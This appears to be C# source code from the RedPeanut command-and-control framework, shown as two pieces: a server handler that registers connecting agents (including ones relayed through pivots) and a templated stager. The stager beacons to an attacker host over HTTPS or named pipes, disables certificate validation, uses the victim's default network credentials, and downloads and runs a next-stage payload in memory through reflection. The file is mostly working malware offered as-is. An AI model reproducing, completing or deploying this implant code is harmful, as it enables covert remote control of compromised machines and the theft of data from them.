private ActionResult StepOne(StreamReader reader) { AgentIdReqMsg agentidrequest = null; try { string line_t = reader.ReadToEnd(); Dictionary <string, string> args = GetParsedArgs(line_t); var line = DecryptMessage(RedPeanutC2.server.GetServerKey(), args.GetValueOrDefault(Paramname)); agentidrequest = JsonConvert.DeserializeObject <AgentIdReqMsg>(line); } catch (Exception) { // Someting goes wrong decrypting or deserializing message return not found Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found"); Program.GetMenuStack().Peek().RePrintCLI(); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } try { IAgentInstance agent = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), agentidrequest.address, agentidrequest.port, agentidrequest.framework, Profileid); //If agentidreq come from a pivoter set the prop if (!string.IsNullOrEmpty(agentidrequest.AgentPivot)) { IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentidrequest.AgentPivot); agent.Pivoter = agentInstance; } RedPeanutC2.server.RegisterAgentInbound(agent.AgentId, agent); string response = CreateMsgAgentId(agent, RedPeanutC2.server.GetServerKey(), Profileid, agentidrequest.framework); //Set cookie SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), agent.AgentId), 0); Console.WriteLine("\n[*] Agent {0} connected", agent.AgentId); Program.GetMenuStack().Peek().RePrintCLI(); return(Ok(response)); } catch (Exception e) { // Operation error Console.WriteLine("[x] Operation error {0}", e.Message); Program.GetMenuStack().Peek().RePrintCLI(); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } }
public static void Execute() { string[] pageget = { #PAGEGET # }; string[] pagepost = { #PAGEPOST # }; string param = "#PARAM#"; string serverkey = "#SERVERKEY#"; string host = "#HOST#"; string namedpipe = "#PIPENAME#"; int port = 0; int targetframework = 40; Int32.TryParse("#PORT#", out port); Int32.TryParse("#FRAMEWORK#", out targetframework); Thread.Sleep(10000); AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg(); agentIdReqMsg.address = host; agentIdReqMsg.port = port; agentIdReqMsg.request = "agentid"; agentIdReqMsg.framework = targetframework; string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg); bool agentexit = false; while (true && !agentexit) { try { string resp = ""; string cookievalue = ""; NamedPipeClientStream pipe = null; if (string.IsNullOrEmpty(namedpipe)) { CookiedWebClient wc = new CookiedWebClient(); wc.UseDefaultCredentials = true; wc.Proxy = WebRequest.DefaultWebProxy; wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS # wc.Headers = webHeaderCollection; ServicePointManager.Expect100Continue = true; ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; ServicePointManager.DefaultConnectionLimit = 9999; ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); }); string post = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate)); string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post); resp = wc.UploadString(rpaddress, post); Cookie cookie = wc.ResponseCookies["sessionid"]; cookievalue = cookie.Value; } else { try { pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous); pipe.Connect(5000); pipe.ReadMode = PipeTransmissionMode.Message; //Write AgentIdReqMsg var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate); pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length); var messageBytes = ReadMessage(pipe); resp = Encoding.UTF8.GetString(messageBytes); } catch (Exception) { } } var line = DecryptMessage(serverkey, resp); AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line); object[] agrsstage = new object[] { line, cookievalue, pipe }; System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage)); assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage); }